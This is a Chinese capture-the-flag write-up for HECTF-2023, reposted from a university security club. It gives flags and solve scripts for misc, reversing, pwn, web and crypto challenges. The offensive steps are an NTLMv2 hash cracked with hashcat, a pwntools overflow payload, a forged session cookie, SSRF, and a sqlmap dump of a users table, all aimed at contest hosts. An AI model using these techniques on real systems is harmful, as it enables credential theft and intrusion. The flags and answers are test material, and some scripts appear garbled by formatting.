HECTF-2023 WriteUp

admin
admin
admin
138774
文章
114
评论
2023年12月23日10:28:36评论42 views字数 9348阅读31分9秒阅读模式

恭喜师傅们在HECTF-2023中取得第10名的好成绩,解出题目数量为17道,师傅们太强了!!!

HECTF-2023 WriteUp
Misc

签到

无需多言

HECTF{Welcome_To_HECTF_2023}
Osint

HECTF{河北省邯郸市永年区永年太极广场}

ezpcap

HECTF-2023 WriteUp



密码:X2z0Um23RF
压缩包数据:
HECTF-2023 WriteUp
HECTF-2023 WriteUp

斗地主

HECTF-2023 WriteUp
导出gif图片
HECTF-2023 WriteUp
黑桃->s 红桃->h 梅花->c 红尖->d
HECTF-2023 WriteUp
得到密码。根据牌


https:

/

/www.bilibili.com/video


/BV1Lj41187kx/
一共b站视频,对应图片binwalk出的密码。


small

joker -> kaf

big


joker -> wi1
最后在农民的牌得到flag图片



HECTF{Dou_di_Zhu_uhZ_id_uoD_hEccctf_TY6d145A57R7WVz}

咖啡宝贝

HECTF-2023 WriteUp
跟据提示得到密码
HECTF-2023 WriteUp
百度网盘是二维码拼图:
直接拼,才24张
HECTF-2023 WriteUp
恭喜weber获得最后的flag:



HECTF{java_ca_fei_bao_bei}

签退

HECTF-2023 WriteUp

NT?M

打开压缩包
发现很明显的是
NTLM的流量包
HECTF-2023 WriteUp
第一步先过滤
ntlmssp这一字符串进行数据包筛选,获得身份验证的握手包。
HECTF-2023 WriteUp
查找NTLMSSP_AUTH包。将数据包向下过滤到Security Blob层,就可以得到如下好东西:
HECTF-2023 WriteUp
将域名和用户名复制到文本文档中。
深入查找NTLM响应部分,找到NTProofStr字段和NTLMv2的响应。将它们作为十六进制字符串复制到文本文档中。
NTLMv2Response是从ntlmProofStr开始,因此从NTLMv2的响应中删除ntlmProofStr。
HECTF-2023 WriteUp
在Wireshark的搜索过滤器中输入ntlmssp.ntlmserverchallenge。就会发现NTLM Server Challenge字段,通常这个数据包是在NTLM_Auth数据包之前。将该值作为十六进制字符串复制到文本文档。
HECTF-2023 WriteUp
将以上的所有值按以下格式保存到crackme.txt:
username::domain:ServerChallenge:NTproofstring:modifiedntlmv2response
HECTF-2023 WriteUp
利用hashcat爆破
hashcat -m 5600 crackme.txt rockyou.txt
得到密码 qwe123!@#
md5加密得到flag

HECTF{fca812f055d5fdcd3a355b63ceaad991}
HECTF-2023 WriteUp
Re

ezre

一眼顶真,循环异或
HECTF-2023 WriteUp
HECTF-2023 WriteUp

HECTF{T31s_1s_A_mAg1ca1_3h1ng}

Ez_Android

hook出他的密文,一眼顶针是个迷宫
HECTF-2023 WriteUp
HECTF-2023 WriteUp
分析代码,发现他的默认变换改成了hjkl,对应的变换一下啊就可以了

HECTF{jjjjjljjjlljlllkklkkkhhh}

ezzzvm

HECTF-2023 WriteUp
分析代码可知就是abcdef的操作都来了一遍,除了c那个有个异或其他都是替换,没啥用,直接写脚本


a = [

0x4d

, 

0x42

, 

0x44

, 

0x51

, 

0x3f

, 

0x7c

, 

0x4f

, 

0x6a

, 

0x58

, 

0x74

, 

0x34

, 

0x62

, 

0x6a

, 

0x74

, 

0x58

, 

0x6f

, 

0x34

, 

0x73

, 

0x7e

, 

0x58

, 

0x74

, 

0x36

, 

0x6a

, 

0x75

, 

0x69

, 

0x34

, 

0x7a

] 

for

 i in 

range

(

len

(a)):

    a[i] = (a[i] + 

1

) ^ 

6

print

(chr(a[i]),end=


'')

HECTF{Vm_s3ems_v3ry_s1mpl3}
HECTF-2023 WriteUp
pwn

sign



from pwn import * 

r = remote(

"101.133.164.228"

,30380)

pl = '-4294967230'

r.sendline(pl) 


r.interactive()
HECTF-2023 WriteUp
web

伪装者

抓包一步步做
session伪造的cookie key为zxk1ing
eyJrZXkiOiJ6eGsxaW5nIiwidXNlcm5hbWUiOiJ6eGsxaW5nIn0.ZVgYag.z2BMF2B8kyQS7DC41cdDPeTvtCE
HECTF-2023 WriteUp
之后访问/P1aceuWillneverkn0w
只有一个图片,访问图片发现存在url
测试发现ssrf漏洞
直接读取flag
HECTF-2023 WriteUp

EZweb

什么?投菜村长一票就送遥遥领先手机(sort传参)
打开页面,404的大字在眼前
HECTF-2023 WriteUp
发包会发现注释里有个404.php
HECTF-2023 WriteUp
访问
跳转的投票界面
测了好久发现是sql注入,太不明显了!!!!
sqlmap直接索了
1.txt


POST

/404.php

 HTTP/1.1

Host

: 101.133.164.228:32385

User-Agent

: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

Accept

: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language

: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding

: gzip, deflate

Content-Type

: application/x-www-form-urlencoded

Content-Length

: 6

Origin

: http://101.133.164.228:32385

Connection

: close

Referer

: http://101.133.164.228:32385/404.php

Cookie

: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IjExIn0.YrHwWF1RRyxqpta2G-dnwRRjoq53lCOLYVxv4l_BLMI; seed=976696390

Upgrade-Insecure-Requests

: 1 

sort

=


1
python3 sqlmap.py -r 1.txt -D ctf -T users -dump -batch
HECTF-2023 WriteUp
得到flag

HECTF{Jia_You_Weber}
HECTF-2023 WriteUp
Crypto

rsarsa

HECTF-2023 WriteUp
得到seed



114514


#脚本1

#Sage 

import

binascii

def

attack(c1, c2, n, e):

PR.<x>

=

PolynomialRing(Zmod(n))

    # replace a,b,c,d

g1

 = 

(30509*x+13601)**e - c1

g2

 = 

(92095*x+27065)**e - c2 

def

gcd(g1, g2):

while

g2:

g1,

g2 = g2, g1 % g2

return

g1.monic()

return

-gcd(g1, g2)[0]

c

 = 

23001012057110779471190091625946693776382380529397302126337301229214301450335125076016991835054198112255974220434689958104931664098817350134656616154892781885504255726632558690544057380195511404078662094726952602350250840712610362029824982069179543810686494204685887486972937880502875441232004432323308734978847464589775857815430854038396134952486665687531579988133729365443247597395131516449487146786214227230853061720614077115599878358089377114269765796099004940883513036567103436154122335792598432012140232905658895014924069330265282364249236142072335363164451294973492092043110680377767954710822286121195290921259

n

 = 

25797576442752368834409243494498462987370374608513814739930733437032797864549696772439769896270235017474841764016848627149724764584643408544417890463920153063835758878658712790547466715525246861709503145754424896044647787146006099053059124466248594151765065039034244830614724509092882854620642569723528913880146979990993657935598837645247839225413889995373643109990149255485373119338024345925311643249141660177285328457994476509430988280481564046398593906405870633323621548853838399385539924067139236445142933316057900841508972844270649504321178274091144241788883353514769368447833090379142367062327674855735832181241

c1

 = 

5702553209026762891130621254037294747819864952568824327221430749829654552175171307151888953348659971422228556686092434932000213695492351602755144510029319044193567051613888876933660356756790444392278614143455408803808095980542751023095024106689759843322130186219560734082292015929006937318400901378373771587448471762923415750064340829545587346927358411518874090282598069394946985795177419501659425500481799157093068337225389827654860680897913114945871197415129055139716514884716404289565297854681809258375973195355836553939670482515484347869258398517276876478311544109924573128946617113822561968330536525876279165313

c2

 = 

17562619948191690401152271053920025392401205523418067246455197241332062181407775133406742024747779181762812656501246379566147855594504112107873162350649668441267907193889705868572309785100582281795380779594946422800722070311908572538672508371123334385630310655242811756206073131919770939609347021343765434127086363844595938894714892990053114153402729297796655717510572619694559203260762574159375142757462082162882775921182437134358375300674547217425590072112733480640372328934982979603312597484512120618223179217692002851194538130349201457319160001114007059615596355221194709809437500052122684989302563103918409825040

e

 = 

17

m1

 = 

attack(c1, c2, n, e)

print(binascii.unhexlify("%x"


% int(m1)))



HECTF{r3411y_easy_R4nd0m_And_r3l4ted_m3554ge_att4ck}

littleblock



from

Crypto.Util.number import long_to_bytes, bytes_to_long 

encrypted_message

 = 

b'xa1x14xa66x9cx88xe3xeco?xe2x95xbdxcdx1a2)ixf5_)x15Hxf2yxecx8dxfc*KUxefvxddxd0X' 

# 逆向 circular_shift_left 函数

def

circular_shift_left(int_value, k, bit=32):

 bin_value = bin(int_value)[2:].zfill(32)

 bin_value = bin_value[k:] + bin_value[:k]

 int_value = int(bin_value, 2)

 return int_value 

def

dec_block(block):

 block ^= 3279553481

 block = circular_shift_left(block, 21)

 block ^= 1909693462

 block = long_to_bytes(block)

 return block 

# 逆向 convert 函数

def

myfill(num,fill_num): 

 return bin(num)[2:].zfill(fill_num) 

n1

 = 

myfill(2245263360,32)

n2

 = 

myfill(2029229568,32)

def

reverse_convert(c):

    # 先将字节块转换为16进制字符串,然后去掉前缀 '0x',最后填充至32位

 c = c.hex()

 c = myfill(int(c, 16), 32) 

    #4

 m1 = int(c[:13],2)^int(c[-13:],2)

 m1 = myfill(m1,13)

 c = c[:19]+m1 

    #3

 m1 = int(c[:15],2)^(int(c[-15:],2)&int(n1[:15],2))

 m1 = myfill(m1,15)

 c = m1+c[15:] 

    #2

 m1 = c[-9:]

 m2 = int(c[-18:-9],2)^(int(m1,2)&int(n2[-18:-9],2))

 m2 = myfill(m2,9)

 m3 = int(c[-27:-18],2)^(int(m2,2)&int(n2[-27:-18],2))

 m3 = myfill(m3,9)

 m4 = int(c[:5],2)^(int(m3[-5:],2)&int(n2[:5],2))

 m4 = myfill(m4,5)

 c = m4+m3+m2+m1 

    #1

 m1 = int(c[13:26],2)^int(c[:13],2)

 m1 = myfill(m1,13)

 m2 = int(m1[:6],2)^int(c[-6:],2)

 m2 = myfill(m2,6)

 c = c[:13]+m1+m2 

 return int(c, 2) 

# 解密整个消息

def

my_decblock(encrypted_message):

 assert len(encrypted_message) % 4 == 0

 decrypted_message = b''

 IV = bytes_to_long(b'retu')

 blocks = [encrypted_message[i:i + 4] for i in range(0, len(encrypted_message), 4)] 

    # 解密每个块

 for i in range(len(blocks)):

     block = bytes_to_long(blocks[i])

     block ^= IV

     block = dec_block(block)

     block = reverse_convert(block)  # reverse_convert 现在返回整数

     IV = bytes_to_long(blocks[i])  # 更新 IV 为当前块的密文

     decrypted_message += long_to_bytes(block, 4)  # block 现在是整数 

 return decrypted_message 

# 解密得到flag

flag

 = 

my_decblock(encrypted_message)

print("Recovered


flag:", flag)


Recovered

 flag: b


'HECTF{spodjoqw321jp3ij09adfiosofrga}'

大帝攻占福岛

根据题目描述,每是个字符为一组,从第一组开始偏移一位,其他组依次递增
偏移的话就是凯撒
写出脚本


def 

caesar_cipher_decrypt

(

char

, shift

):

    # 将字符转换为其ASCII码值

    ascii_value

 = ord(

char

)

# 减去偏移量

    shifted_value = ascii_value - shift

# 将偏移后的ASCII码值转换回字符

return

 chr(shifted_value) 

def 

split_and_decrypt

(

text, group_size

):

    groups

 = [text[i:i+group_size] 

for

 i 

in

range

(

0

, len(text

), group_size)]

    decrypted_groups

 = []

for

 i, 

group

in

enumerate

(

groups

):

        shift

 = i + 

1

        decrypted_group = 

''

.

join

(caesar_cipher_decrypt(

char

, shift) 

for

char

in

group

)

        decrypted_groups.append(decrypted_group)

return

 decrypted_groups 

# 示例字符串

input_text = 

"zpvepoudbsgcdqwvjgocqg|rxrqo|feviefsyx}szwt|skqfl?NKIZL�YZUVfU|jslhyfzmiom…"

# 按照要求分组和解密

result = split_and_decrypt(input_text, 

10

)

# 输出结果

for

 i, 

group

in

enumerate

(

result

):

print

(

f

"Group {i+1}: {group}"


)

HECTF{STOP_Nuclear_sewage}


我们仨

from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
xor_result = 113271863767201424639329153097952947311122854394813183532903131317262533549675
encrypted_flag = b'_1x16xc2;xb1xddyx14xddx14xe5{x19x04:'
xor_result_bytes = long_to_bytes(xor_result)
key_high = xor_result_bytes[:16]
secret_key = key_high + key_high
xor_result_low = xor_result_bytes[-16:]
init_vector = bytes(a ^ b for a, b in zip(secret_key[:16], xor_result_low))
cipher = AES.new(secret_key, AES.MODE_CBC, init_vector)
decrypted_flag = cipher.decrypt(encrypted_flag)
print(f"Decrypted flag: {decrypted_flag}")

# Decrypted flag: b'RSAKEYISFTCEHx00x00x01'
压缩包密码 FTCEH


e=65537

n=: 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261

c=:7650350848303138131393086727727533413756296838218347123997040508192472569084746342253915001354023303648603939313635106855058934664365503492172


没了 真没了 加油少年
很小,n直接分解
得到第二个key

keyisEa51stRsA

gIHkeIlRQp1fLeSWEqZJdOTO4aRYRB2OGRcBycHQ1OAdi6UEULYbwIvYh+0alYScSEoN4TOejgTjdPsetrURRlLX6dcifjX6VvLxY7TnMk7c8/xy17mybq/yNQf0vFGh8byC88bUeHian9dA2Qh6rRBYS1I7iNxM62RtCFZ+1OKeaqGIDjf3/VuPlbnCePYIY5FVs6xNXjkGh0m57t2QW4CoGI5lz6OcAAwg4AHP0d8CfeldOF/TogPwOiPaRlDbtHXCh54Bs5ZivV+jDerr0RQvCGYBFHYLJnvyrFtyZC9BxAQ8gQnGlWNDjE1V6BByUvJjpI9DcUyRSNN21rUWouOiLwtKX0BgDQkGH9PhtzhmGYI+R3lZJ4x30l+Xqweu 
DES
CBC PKCS7 key:hectf iv:0000


你知道么?梵蒂冈的常住人口只有800人,同时,仅澳大利亚就有4700万只袋鼠。如果袋鼠决定入侵梵蒂冈,那么每一个梵蒂冈人要打58750只袋鼠,你不知道!你不在乎!你只关心你自己的

flagHECTF{DES_RSA_AES_WOMENSA_ZHENQIANG}

网络安全社团公众号


微信号 : qlnu_ctf


新浪微博:齐鲁师范学院网络安全社团

HECTF-2023 WriteUp

原文始发于微信公众号(齐鲁师院网络安全社团):HECTF-2023 WriteUp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月23日10:28:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HECTF-2023 WriteUphttps://cn-sec.com/archives/2230028.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息